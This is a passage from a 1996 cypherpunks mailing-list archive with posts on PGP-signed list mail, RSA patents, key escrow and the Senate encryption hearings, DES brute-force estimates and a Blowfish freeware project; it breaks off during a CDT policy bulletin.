b3IgZnV0dXJlIHNwZWFrZXJzLiAgSWYgeW91IGFyZSBpbiBCb3N0b24gb24g
dGhlDQpmaXJzdCBUdWVzZGF5IG9mIHRoZSBtb250aCwgYW5kIHlvdSB3b3Vs
ZCBsaWtlIHRvIG1ha2UgYSBwcmVzZW50YXRpb24gdG8gdGhlDQpTb2NpZXR5
LCBwbGVhc2Ugc2VuZCBlLW1haWwgdG8gdGhlIERDU0IgUHJvZ3JhbSBDb21t
bWl0dGVlLCBjYXJlIG9mIFJvYmVydA0KSGV0dGluZ2EsIHJhaEBzaGlwd3Jp
Z2h0LmNvbSAuDQoNCkZvciBtb3JlIGluZm9ybWF0aW9uIGFib3V0IHRoZSBE
aWdpdGFsIENvbW1lcmNlIFNvY2lldHkgb2YgQm9zdG9uLCBzZW5kDQoiaW5m
byBkY3NiIiBpbiB0aGUgYm9keSBvZiBhIG1lc3NhZ2UgdG8gbWFqb3Jkb21v
QGFpLm1pdC5lZHUgLiAgSWYgeW91IHdhbnQNCnRvIHN1YnNjcmliZSB0byB0
aGUgRENTQiBlLW1haWwgbGlzdCwgc2VuZCAic3Vic2NyaWJlIGRjc2IiIGlu
IHRoZSBib2R5IG9mIGENCm1lc3NhZ2UgdG8gbWFqb3Jkb21vQGFpLm1pdC5l
ZHUgLg0KDQpMb29raW5nIGZvcndhcmQgdG8gc2VlaW5nIHlvdSB0aGVyZSEN
Cg0KQ2hlZXJzLA0KUm9iZXJ0IEhldHRpbmdhDQpNb2RlcmF0b3IsDQpUaGUg
RGlnaXRhbCBDb21tZXJjZSBTb2NpZXR5IG9mIEJvc3Rvbg0KDQoNCg0KLS0t
LS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0NClZlcnNpb246IDIuNi4yDQoN
CmlRQ1ZBd1VCTWNsV0l2Z3lMTjhidzZaVkFRSFRLUVArSVBFR3lLZHdxSUMz
VGNFQ2t1ZW0zNVJGL2RLOVdEdHINCkEzWXBSWFRVNCs0bk9hSStLTURLNWhI
MHZWN3FPSTB0K2wzZktkUllqSFJCazN0cDRHUHkvQjJHeWxKRlRXdEUNClNU
WUR6YTR4ZGdoaXEvZDRJa1pXMG1uM1hGN2JLMllsc1I4WHFlMWRMWGtwdW9F
bWk0ZGFpYWJ5NEJ3cWYzNVcNCjRjWExRZFJxWjBVPQ0KPTJDY0MNCi0tLS0t
RU5EIFBHUCBTSUdOQVRVUkUtLS0tLQ0KDQotLS0tLS0tLS0tLS0tLS0tLQ0K
Um9iZXJ0IEhldHRpbmdhIChyYWhAc2hpcHdyaWdodC5jb20pDQplJCwgNDQg
RmFycXVoYXIgU3RyZWV0LCBCb3N0b24sIE1BIDAyMTMxIFVTQQ0KIklmIHRo
ZXkgY291bGQgJ2p1c3QgcGFzcyBhIGZldyBtb3JlIGxhd3MnLA0KICB3ZSB3
b3VsZCBhbGwgYmUgY3JpbWluYWxzLiIgICAgLS1WaW5uaWUgTW9zY2FyaXRv
bG8NClRoZSBlJCBIb21lIFBhZ2U6IGh0dHA6Ly93d3cudm1lbmcuY29tL3Jh
aC8NCg0KDQo=
--Boundary..3942.1071713588.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Janzen <janzen@idacom.hp.com>
Date: Sat, 22 Jun 1996 11:03:35 +0800
To: cypherpunks@toad.com
Subject: Re: DCSB: Electronic Commerce: The State of the Art
In-Reply-To: <19960621090343293.AAA253@geoff>
Message-ID: <9606211927.AA14661@sabel.idacom.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Geoff Klein writes:
> [...]
> In the process of testing PSecure I have collected from the 
> keyservers, the keys of most people on the list who pgp sign their 
> messages. (Another neat feature of PSecure makes this a one click task)

> I could quite easily perform the service of bouncing messages with bad 
> signature back to the list.

> Please let me know if people agree that this would be a useful 
> service, or is it inappropriate ?

Bounced messages would probably be considered inappropriate noise by
most list members.  However, what about bouncing the message back to the
sender only?  This alerts him to a possible problem -- a bad keyserver
entry, an attempted forgery, a mail transmission error, etc. -- without
bothering everyone else.

MJ

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMcr3eG3Fsi8cupgZAQGprwP/RwVsYIiMZ5ZmMTM+d6i/p4u6sUdV0Jye
MFtPX79z2mcW8Mr7LpWqYNZojbr2lLvBie9kIsjKJDdYcvMrs5/5Mgagm4TlKIss
mRHve7HuijdTO17p8heHdjbIYo2Rk57O/8oYafHU9hit3+dpsX7OdQB3oFKH0Uy2
MQKry5CU+qc=
=k0VT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Sat, 22 Jun 1996 07:35:15 +0800
To: me@muddcs.cs.hmc.edu
Subject: Re: where'd Bal's PKS go?
In-Reply-To: <199606201724.KAA07394@muddcs.cs.hmc.edu>
Message-ID: <199606211629.JAA08017@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Thu, 20 Jun 1996 10:24:12 -0700
   From: me@muddcs.cs.hmc.edu (Michael Elkins)
   X-Mailer: Mutt 0.34
   Mime-Version: 1.0
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   Did it move?  I hadn't seen any announcement of this...

No, it hasn't moved, but the server it was running on got "upgraded" and
some things were (or still are) broken.  The e-mail based keyserver and
the older WWW interface were working as of Wed. night.  The new WWW
keyserver code compiles but has some bugs I'm still trying to work out.;
I hope to have it back on-line soon.

Sorry for the problems, folks

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: se7en <se7en@dis.org>
Date: Sat, 22 Jun 1996 10:36:05 +0800
To: cypherpunks@toad.com
Subject: Science Lessons in the Mountains of New Mexico
Message-ID: <Pine.BSI.3.91.960621133903.12753A-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain




Cryptography may not academic science's only contribution to making 
business work in an unpredictable, technology-driven world. If a growing 
community of natural scientists, social scientists, and business 
theorists are right, then the cryptographic algorithms taht make 
electronic transactions secure will soon seem downright prosaic.

This unusual admixture of pure researchers and real-world practitioners 
tends to congregate around research institutions in New Mexico, which has 
been a scientific hotbed ever since the atomic bomb project of the 1940s.

The current thinkers are looking into not just mathematical complexity, 
but complexity itself. Complexity theory. Complex systems of any 
definition--the weather, perhaps, or the human immune system, or the 
organizational behavior of insects--and how their workings and 
adaptations might hold lessons for other fields, not least business.
 
It all comes together at the Santa Fe Institute, at a hilltop cul de sac 
just far enough removed from the New Mexico tourist mecca to give a small 
community of visiting researchers the distance and quiet they need to 
contemplate anything from the microbial to the cosmic.

The Santa Fe Institute was founded in 1984 on the idea that molecular 
biologists, cosmologists, and virtually any other specialists could make 
interdisciplinary breakthroughs through shared perspectives. 

"Putting people together from different fields is what we do," said 
institute vice president L.M. "Mike" Simmons. "The theme is 
multidisciplinary research on complex systems."

"This is a place where people can get away, exchange ideas, and learn 
from each other--to harness creativity at the boundries between fields."

In a classic example, immune-system research cross-pollinated with 
computer science and produced a computer security technique that protects 
against viruses and other attacks.

Business and economics are very much in the mix with earth sciences, 
genetics, and advanced products of computer science like adaptive 
computation, machine learning, and artificial life. Software guru Esther 
Dyson, retired BankAmerica Corp. chairman Leland Prussia, and Stewart 
Brand of Whole Earth Catalog fame are institute trustees.
 
Kenneth Arrow, the Stanford University economist and Nobel Prize winner, 
sits on the institute's science board. The board's co-chairmen are 
trustees Murray Gell-Mann, a Nobel Laureate in physics from California 
Institute of Technology, and John Holland, a leading complexity theorist 
from the University of Michigan.

Prof. Gell-Mann happens to be "in residence" on the subject of 
"complexity, entropy, and teh physics of information."

In 1994, Santa Fe Institute launched a Business Network for Complex 
Systems Research. The more than 25 members include Allied/Signal, Boston 
Consulting Group, John Deere, Ernst & Young, McKinsey & Co., Pacific 
Bell, Shell, and one financial services representative--Citicorp.

The members each pay $25,000 a year to support the institute's complex 
systems research. In return, they have access to the research and the 
scientists, meet periodically to pursue and share lessons, and nad send 
representatives to summer school to rub shoulders with doctoral fellows.

Citicorp has sadi little about its involvement or what it gets out of it. 
"They've been a big supporter since our first economics program in 1987," 
Mr. Simmons said. "I can only conclude that they support the mission of 
pure research."

Citicorp has gone so far as to endow a Santa Fe Institute professorship, 
held by Stanford economist Brain Arthur, who directs the program on "The 
Economy as a Complex Adaptive System." Mr. Arthur has done some deep 
thinking about how knowledge- and information-based economic forces turn 
the iron law of diminishing returns on its head. His notion of 
"increasing returns"--defined by Wired magazine as "the more you sell, 
the more you sell"--influenced the Justice Department in its decision to 
block the proposed Microsoft-Intuit merger last year.

Mr. Arthur presumably has influenced Citicorp's strategic thinking. Colin 
Crook, the bank's chief technology officer, quotes him liberally in 
campaigning for a more "adaptive" organization and culture.

Meanwhile, the Citicorp-Santa Fe axis is spawning synergistic byproducts 
of its own.

The Financial Services Technology Consortium, a group of 14 mostly large 
U.S. banks that Citicorp organized to explore and test emerging payment 
and communications technologies, has worked closely with the Department 
of Energy's national research laboratories. Santa Fe is conveniently 
situated between two of them--Sandia, to the south in Albuquerque, and 
Los Alamos, a half-hour drive northwest--and many consortium meetings 
have been held in the area on such subjects as data security, biometric 
identification, and fraud control. 

Plenty of Los Alamos brainpower--Mr. Simmons himself spent much of his 
career there--is now concentrated at the Santa Fe Institute.

The Smart Card Forum, another initiative of Mr. Crook's Citicorp 
technology office, has parallel Santa Fe connections that may be getting 
stronger. Catherine Allen, the former Citibank vice president and 
founding chairman of the Smart Card Forum, has settled in New Mexico to 
launch a consulting firm, the Santa Fe Group. She expects to keep working 
for the forum and on card-technology advances while pursuing new ideas 
and business opportunities in emerging management and complexity theories.

Ms. Allen has developed close ties to the Santa Fe Center for Management 
Strategy, which has been trying to link the Santa Fe Institute principles 
with business problems in a seminar series called "Complexity and 
Strategy in Action." The collaboration may result in one or more ongoing 
forums to expose business people from various industries and disciplines 
to the new ideas. 

The management center was organized by Howard Sherman, a successful 
franchising enteprenuer, one-time philosophy professor, and member of the 
Santa Fe Institute's business network, whose intellectual quest runs from 
Plato and Aristotle through Kant to Einstein and Brian Arthur.

"Brian Arthur has said that all business problems and failures are 
cognitive problems and failures," Mr. Sherman said. "I am interested in 
the impact of complexity on what he and I call "the cognitive."

se7en

-------------------------------------------------------------------------

Resources:

Los Alamos National Laboratory
Industrial Partnership Office
Irene Gabel 505-665-2133

The Santa Fe Group
Catherine Allen
505-466-6434

Santa Fe Institute
Bruce Abell or Mike Simmons
505-984-8800

Santa Fe Center for Management Strategy
Howard Sherman
505-466-7901

Sandia National Laboratories
Technology Transfer and
Commercialization Center
Warren Siemens 505-843-4200






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Sat, 22 Jun 1996 11:13:57 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: "Filegate" may be good news for us
Message-ID: <v02140b03adf0b54b6a82@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


>The current flap over the Clinton Administration's request for and receipt
>of FBI dossiers is being called "Filegate." The Administration has claimed
>the requests were innocent, and based on outmoded Secret Service lists. The
>Secret Service denies this, and says the list did not come from them. ...

>Why is this good news for us? (Besides the partisan issue of embarrassing
>and degrading the current government, which is always a good thing.)
>
>Because it underscores how difficult it is, even with ostensible
>safeguards, to control the distribution of dossiers, secret files, and
>surveillance reports.

Another reason is that it shows the problems with sensitive data even if
people have *legitimate* access to that data (i.e., assuming that there
was no mischief involved.

Ignoring all privacy issues, escrowed encryption keys will be extremely
valuable as they will allow insight into financial transactions. Thus,
they will be very attractive targets for economic espionage.

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Hopkins <hacksaw@holly.ColoState.EDU>
Date: Sat, 22 Jun 1996 10:33:05 +0800
To: cypherpunks@toad.com
Subject: unsuscribe
Message-ID: <Pine.A32.3.91.960621144854.52010A-100000@holly.ACNS.ColoState.EDU>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 22 Jun 1996 07:34:37 +0800
To: "Paul S. Penrod" <furballs@netcom.com>
Subject: Re: Current status of RSA patent... (fwd)
Message-ID: <199606211457.HAA23311@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: Paul S. Penrod <furballs@netcom.com>
              Cypherpunks <cypherpunks@toad.com>

** Reply to note from Paul S. Penrod <furballs@netcom.com> 06/19/96 10:14am -0700
  
        I think most of the basics were covered in the list response, 
    except each had a piece or two to say, part of which was usually
    incorrect, and none caught the scope of the issue in its fullness.
 
        Until a patent is sucessfully challenged _and_ "destroyed," it 
    is resumed valid in the country of issue, regardless of the
    source of a competing product which may have been manufactured in a
    country where patents mean little, if anything.  --e.g.  any
    country other than the U.S., Canada, and Western Europe.
 
        GOOD patents, with claims which are both narrow enough to 
    define what is patentable and broad enough to cover "work-arounds,"
    are expensive to obtain:  >$10,000 domestic plus foreign costs. 
    there are arcane rules as to the time of filing for foreign patents
    if they are to be valid, often requiring separate efforts, and
    different claims, in each jurisdiction.
 
        smaller companies are obviously at a disadvantage since 
    resources, particularly in development houses, are small. 
    development companies tend to recover their expenses with immediate
    product (much smarter than waiting for the patent office to declare
    you King Kong) thereby also avoiding being beaten in the market
    window by an also-ran product.
 
        An alternative theory is to pray that a Fortune 100 releases 
    product which violates your patents.  Caveat:  it is still your
    responsibility to "protect" your product and not lose your rights
    by default. This is expensive and further requires that you reduce
    your theory to practice -- you do reduce the theory to practice,
    you are in a very weak position --again, unless you are IBM, AT&T,
    etc.  who practice law by intimidation and burying the opposition
    in excessive and frivolous paperwork.
 
        Then there is the problem of the capital required to litigate 
    an interloper.  When I attempted to litigate the Fortune #1 company
    10 years ago --the MINIMUM advance fee requested by every lawyer
    (even ones I have previously consider fiends) was $2 MILLION; 
    which, although still less than the contractual royalty claim, was
    not exactly in my bank account!  --and, the greedy bastards also
    wanted 10-15 years to collect and 33-50% of the recovery plus 
    expenses.
 
        So, I litigated the claim myself (9 months), and won in Federal 
    District Court. I was lucky, with a never-used-in-the-US law
    degree; the five other companies in the same bag received nothing
    on their claims:  they could not afford the legal expenses.  I did
    not like lawyers as a breed prior to this incident, and I like them
    significantly less now. we will not discuss the issue of respect or
    their value as a food substitute (really.., they taste just like
    chicken).
 
        patents are further cluttered by the fact it averages 3 years 
    to obtain a patent, and technology moves far too fast.  then, even 
    with fundamental patents such as RSA is holding one of, there are
    the legal challenges as to both the validity and whether or not it
    expresses claims which are both original and non-obvious.
    
        non-obvious is a key factor --you can not patent the "fact:" 
    "a chunk of sodium tossed into a toilet ball often destroys the
    toilet...."
 
        lastly, particulary in software, there is the challenge: 
    "...all knowledge should be _free_!"  Well, that is fine and good,
    but how do you pay researchers?  have them pump gas all week and 
    donate research time on the weekends?  very few researchers have
    the piece of mind to be creative when their children are starving. 
    --oh, well, we still have the unmarried nerds who require only 
    space to sleep (standing up), BigMacs and chips....
 
        from my perspective, the patent system is absurd --not because 
    of the protection it purports to provide, but that it is 

        a)  ridiculously slow and arcane, dominated by how a lawyer 
            who has no clue, writes _claims_, in words, defining what 
            is unique; and 

        b)  it is insufficient to deal with _intellectual_ property
            rights which can not always be reduced to a simple
            mechanical/hydraulic drawing and some words _claiming_ its
            uniqueness.  

        The real rub in patents is that _words_, not the technical
    definitions and diagrams, or even the "experts" in trial, that wins 
    patent litigation.  The circuit diagram or the mathematical 
    equation is noting more than a sidebar note. Therefore, patents 
    have become a weapon, a weapon of the established to intimidate the
    new kid on the block.
 
        what are the chances for meaningful patent reform?  slim to 
    none. why?  it will offend the lawyers, and their $10,000 words!

        any of you have been involved in patent litigation must realize
    the absurdity of a Federal jury deciding the validity of high-tech 
    patents.

        and, if you, the developer, take the product to market, you run
    the risk of a major company patenting _your_ idea and litigating 
    you!  but "I have prior art you scream!" --yes, and they will have 
    notebooks with a paper trail and you will have none. what does the 
    legal system require? paper trail.

        personally, I think RSA has been most generous in their 
    licensing: a personal use license of the basic algorithm is free. 
    How do you suppose PGP really exists?  it's free!  RSA has done 
    more to advance cryptography with this policy than any other in many
    years.  the political and public relations benefits to our rights 
    to cryptography and the public relations bonanza for public 
    awareness is not even estimable, let alone measurable.  The Federal
    persecution of Phil Zimmerman was a PR bonanza and a rallying cry.

        on the other hand, the Free Software group, despite the 
    tremendous value to those of us who develop, does nothing to
    protect our basic freedoms, and place the issue before the U.S. 
    (and world) forum.                                                   
    
        whether or not we like like RSA's "charismatic" leader, 
    give credit where credit is due.  if you are creating a commercial 
    product, you pay royalties. 

        remember, patents and patent royalties are a trade-off in the 
    system.  would you not expect royalties for your patent? I know I 
    do; have collected many; and, hope to be able to continue to 
    collect same, despite by dislike of the current U.S. Patent Office.

        that's all, folks!
        



--
Fuck off, Uncle Sam. Cyberspace is where democracy lives!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@XENON.chromatic.com>
Date: Sat, 22 Jun 1996 13:07:13 +0800
To: cypherpunks@toad.com
Subject: For the public record: My submission for the crypto hearings (LONG)
Message-ID: <199606212158.OAA03503@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



I would encourage others to submit their opinions ASAP at:

    http://www.crypto.com

Ern

------- Forwarded Message

Date: Fri, 21 Jun 1996 17:47:51 -0400 (EDT)
From: hua@chromatic.com
Subject: Testimony submitted for Congressional hearings on 6/26/96

The following testimony was submitted from http://www.crypto.com/submit/
Please contact Shabbir J. Safdar at shabbir@vtw.org if any information is not 
correct.

Do you use encryption technogies today (e.g., PGP, etc..):
 no

If no, why not:
 Because it is not built in to a lot of the products I use today (e.g.  email 
programs)

As an Internet user, security and encryption are crucial to my
privacy because:
 Both 1 and 2 equally

Tell us more about why you would (or would not) use strong
encryption as an individual Internet user:
 Unlike murder, terrorism, burglary, etc, there are activities which
are socially "borderline", meaning that some people want to outlaw
but some people don't.  There are activities which may be embarassing
to publicly acknowledge, but aren't really illegal.

I firmly believe in our legal system, but I also firmly believe that
there are questionable laws, and today's criminals and trouble makers
could be tomorrow's civil right advocates or Nobel peace prize
winners or freedom fighters.

Encryption does not allow these "questionable" people to murder or
harm anyone.  It is just software.  It is not a knife or a gun.

Unlike what the FBI wants everyone to believe, encryption does not
mean hackers can now break into the Federal Reserve and destroy the
US banking system (in fact, encryption, among many other technologies,
help protect these systems in the first place).

As a business owner or employee, security and encryption are
critical to my business because:
 Both 1 and 2 equally

Tell us more about why you would (or would not) use strong
encryption as a business user of the Internet:
 Hackers, viruses, industrial espionage, privacy, network traffic
control, time stamping, etc.

I don't believe, for a moment, that being a government official
exempts a person from having character flaws or less-than-saintly
behavior.  I don't think they are necessarily any WORSE either,
but I believe everyone is human to some degree.  There are honest
mistakes, there are less-than-honest mistakes, and there may, on
rare occasions, be horrible evil.  We must hold people in power
(governmental and otherwise) to high standards, but we cannot
lower our guard just because we expect them to be saintly.

Given what you know about Key Escrow systems:
 I would use an escrow system only if I could choose the key holder (including 
my friends, lawyer, accountant, etc.)

Do you think that the government should be able, under certain
circumstances, for a limited time, and only with the specific authorization
of a Judge, have the authority to conduct electronic surveillance in order
protect public safety and national security?
 Yes

Tell us why or why not:
 I think the government should have the resources to be "above
current technology".  They can invest in super-wiz-bang decryption
and surveillance technology that the ordinary person cannot buy
or make.  However, if the ordinary person can buy or make it, then
it is silly to think that a law will make a criminal NOT buy or
make it.  Just look at the illegal weapons trade as an example.

Encryption should be illegal if it a morally, ethically bad thing
to possess or use.  However, making it illegal just because it
becomes extremely inconvenient for law enforcement is like
requiring that every room in every house be installed with a
government-approved video camera, just in case you were involved in
some illegal activity.  Afterall, significant percentages of child
abuse or child molestation (or pick your favorite emotionally-charged
crime) are done within the comfort of the child's home.

This last idea, about the cameras in every room, is not that far off
in some countries.  Britain has cameras in many public areas already.
It would be law enforcement's (excuse the language) "wet dream" to
have such all-seeing access.  The only reason they have not asked for
it is because it would never be acceptable to the public.

But, unlike video cameras, encryption is something which very few
people understand yet, so the FBI can feel okay about asking for
something which only a few "hackers" and "liberals" are against.

What does strict control of encryption buy law enforcement?
Not much.

Encryption is only hides information, but the more globally accepted
illegal behaviors are far more tangible than information.  A murder
assumes that there is a missing person or dead body or traces to be
recovered.  A molested child assumes that there is a child who is
harmed.  No amount of super-military strength encryption can hide
these physical things.

So this issue becomes one of why should we give up privacy for the
sheer convenience of the law enforcement community.

There is also the question of why, no matter how much escrowing,
should there be a strength limitation on encryption?

Who ELSE is trying to decode this stuff besides law enforcement,
who presummably has access to the escrowed keys?

This aspect of the pro-escrow proposals raises all sorts of
questions about just how much hidden abuse is there in the
government.

If you are not a US citizen (and live out side the US) and you
use encryption, please tell us what you use and how you obtained it.
 I am now a citizen, but I was previously a citizen of Taiwan during
some very tough times.  The government was honest about violation of
privacy:  On the phones were clear warnings stating that you should
NOT talk about political issues over the phone; you may be tapped.

That's not a nice situation, but at least they were honest about how
widespread the use of wiretaps would be.  And those were exceptional
times of crisis.

But we, in the US, are not in a time of military-grade crisis.  There
is no foreseeable need for wide-spread imposition of martial law.
There is no uprising, no wide-spread terrorism of any sort.  I just
do not see the need for the surveillance powers that the FBI wants.

Business name:Chromatic Research
Street:615 Tasman Drive, Sunnyvale
State:CA
Zip code:94089-1707
Phone number:(408) 752-9375
Business WWW URL:http://www.chromatic.com
Description of business:
High performance media processors for personal computers.

------- End of Forwarded Message






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Sat, 22 Jun 1996 08:16:40 +0800
To: cypherpunks@toad.com
Subject: Win95 Blowfish Implementation
Message-ID: <199606211918.PAA11089@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I am nearing completion of the alpha version of my Win95 Blowfish 
implementation aka "Hootie" (I couldn't resist).  Both the 
pre-releases and final version of Hootie will be freeware.

But before I do so, I want to double check by information on the 
rights to the following algorithms.  I'm only interested in US 
patents, since I won't be able to export it anyway.

So correct me if any of the following statements are incorrect:

1. Blowfish is not patented and can be used without royalty.
2. SHA can be used without royalty.
3. MD5 can be used without royalty if the RSAREF library is used, 
and if the proper credit is given to RSA.

Also, can the MD5 algorithm be used outside the RSAREF library?  In 
other words, can I rewrite the code to take in effect MFC classes?

I'll post more information about Hootie later. It's not an 
earthshattering or groundbreaking program.  I wrote it largely as a 
learning excercise in MSVC++, but it's a functional program with a 
good user interface so I decided to release it.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMcr1IfBB6nnGJuMRAQGIKgP/V8b6AY7dfbK2EBbVcJ01nfSs5svCaCau
BNC32zW+/0pzoZrz0C8eTUubOhFFwPMzng3QI9A7J197I64UdPtn4crYV8qDjJRU
LeeGhffduh6Jhubd6V5q7VjauQ4khR/Q3kvHvWhA6INBNe9/mQzezaf8HwUr/Tk6
+B9ikYxIUmo=
=6vI/
-----END PGP SIGNATURE-----
--
David F. Ogren
ogren@concentric.net (alternate address: dfogren@msn.com)
PGP Key ID: 0xC626E311
PGP Key Fingerprint: 24 23 CD 15 BF 8D D1 DE  81 71 84 C8 2C E0 4B 01
(public key available via server or by sending a message to
ogren@concentric.net with a subject of GETPGPKEY)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 22 Jun 1996 16:22:45 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Sen. Specter and Kerry move to delay crypto legislation
Message-ID: <199606212219.PAA15671@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:03 PM 6/21/96 -0400, Black Unicorn wrote:
>On Fri, 21 Jun 1996, jim bell wrote:
>> Since "everybody" is supposed to agree that the Leahy encryption bill is 
>> dead, dead, dead, I don't see this as being any kind of problem.  It was 
>> disliked by Clinton and the Denning-types, and with the exception of a short 
>> flurry of mistaken optimism around here, it was roundly excoriated here as 
>> well.  
>
>To which which Leahy Bill are you referring?

The one introduced on February 26, 1996.
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 22 Jun 1996 13:11:14 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Sen. Specter and Kerry move to delay crypto legislation
Message-ID: <199606212303.QAA18192@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:19 PM 6/21/96 -0400, Black Unicorn wrote:
>On Fri, 21 Jun 1996, jim bell wrote:

>> >> Since "everybody" is supposed to agree that the Leahy encryption bill is 
>> >> dead, dead, dead, I don't see this as being any kind of problem.  It was 
>> >> disliked by Clinton and the Denning-types, and with the exception of a short 
>> >> flurry of mistaken optimism around here, it was roundly excoriated here as 
>> >> well.  
>> >
>> >To which which Leahy Bill are you referring?
>> 
>> The one introduced on February 26, 1996.
>
>I think the above message was refering to "procode" however.


Certainly not by name.  It merely referred to legislation that Leahy "sponsored." 
 Leahy _did_ seem to act like he was in favor of the Burns bill, as well,  
after ECPA got the bad press, and maybe he's a co-sponsor of the Procode 
bill as well.  Even so, the letter did not appear to be CC:'d to Burns, so I 
conclude that it was intended to refer to at least the ECPA, if not both bills.  



                          United States Senate
                     Select Committee on Intelligence
 
                             June 7, 1996
                                                   SSCI #96-2219B
 
 The Honorable Patrick J. Leahy
 United States Senator
 Senate Russell Building, Room 433
 Washington, D.C. 20510-4502
 
 Dear Pat:
 
      We write to express our concerns about legislation you have sponsored
 which would impact directly upon federal encryption policy, including export
 control policy.  Recognizing that American innovation in encryption
 technology is unequaled, we appreciate the need to balance US economic
 competitiveness with the need to safeguard national security interests.  As
 such, it is our belief that this legislation requires careful study and
 reflection and that the Senate and the Congress as a whole should proceed
 with caution until all of the implications of such an initiative are fully
 discerned.  Along these lines, it is our understanding that industry
 representatives are currently meeting with the Administration to discuss new
 policy initiatives to address this issue.  Also, both the Congress and the
 Administration have undertaken to conduct a thorough analysis of a two-year
 congressionally-mandated study on federal encryption policy that was
 facilitated by the National Research Council.  We therefore feel that your
 legislation initiative at this time is premature.
 
      We appreciate your efforts to bring some needed clarity to United
 States policy in this area and wish to keep the lines open for discussion
 and debate on this important issue.  The staff point of contact on this
 issue is our Committee Counsel, Mark Heilbrun, who can be reached at
 224-1700.
                                 Sincerely,
 Arlen Specter                                   J. Robert Kerrey
 Chairman                                        Vice-Chairman
 
 cc:  The Honorable Alfonse D'Amato
      Chairman, Senate Committee on Banking

--------------------------------------------------------------------------



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Sat, 22 Jun 1996 12:23:58 +0800
To: perry@piermont.com
Subject: Re: Federal Key Registration Agency
In-Reply-To: <Pine.SUN.3.94.960620211746.20271D-100000@viper.law.miami.edu>
Message-ID: <31CB030B.6BE0@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 
> Michael Froomkin writes:
> > I have seen the text of the speech.  The wire service accounts wildly,
> > wildly exaggerate.  This is a non-story...except for AG Reno's assertion
> > that it would take the government a year to break one DES message with a
> > "supercomputer".  She presumably believes this.  We know the number for
> > known plaintext attacks, but assuming you don't have a known plaintext,
> > what's a more reasonable assumption?
> 
> Known plaintext isn't needed for any brute force DES attack. Indeed,
> our own Dave Wagner showed in a paper not that long ago how to
> automate the process of detecting a good key.
> 
> The numbers in the Blaze et al paper are very realistic on this. A
> year is total bull -- not even within several orders of magnitude of
> accuracy.

Further, known plaintext is actually a very reasonable assumption. In 
S/MIME, for example, the first 8-byte block of text is almost certain to 
be 43 6f 6e 74 65 6e 74 2d, (i.e. the string "Content-"). This makes the 
process of analyzing the results trivial.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: editor@cdt.org (Bob Palacios)
Date: Sat, 22 Jun 1996 11:12:13 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post 2.25 -  Senate Encryption Hearing to be "Cybercast" Live Online6/26
Message-ID: <v02140b05adf0b873d9b1@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
    _____ _____ _______
   / ____|  __ \__   __|   ____        ___               ____             __
  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
   The Center for Democracy and Technology  /____/     Volume 2, Number 25
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 25                        June 21, 1996

 CONTENTS: (1) June 26 Senate Encryption Hering to be "Cybercast" Live Online
           (2) Submit Your Comments for the Hearing Record
           (3) Attend the S.A.F.E. Forum on Encryption - July 1, Stanford, CA
           (4) How to Subscribe/Unsubscribe
           (5) About CDT, contacting us

  ** This document may be redistributed freely with this banner intact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
         ** This document looks best when viewed in COURIER font **
-----------------------------------------------------------------------------

(1) SENATE ENCRYPTION HEARING TO BE "CYBERCAST" LIVE ON THE NET JUNE 26

In a historic first that demonstrates the increasing power of the Internet
Community as a political force, HotWired, DIGEX, the Voters
Telecommunications Watch, and the Center for Democracy and Technology have
teamed up to provide a live, interactive "cybercast" of the Senate Commerce
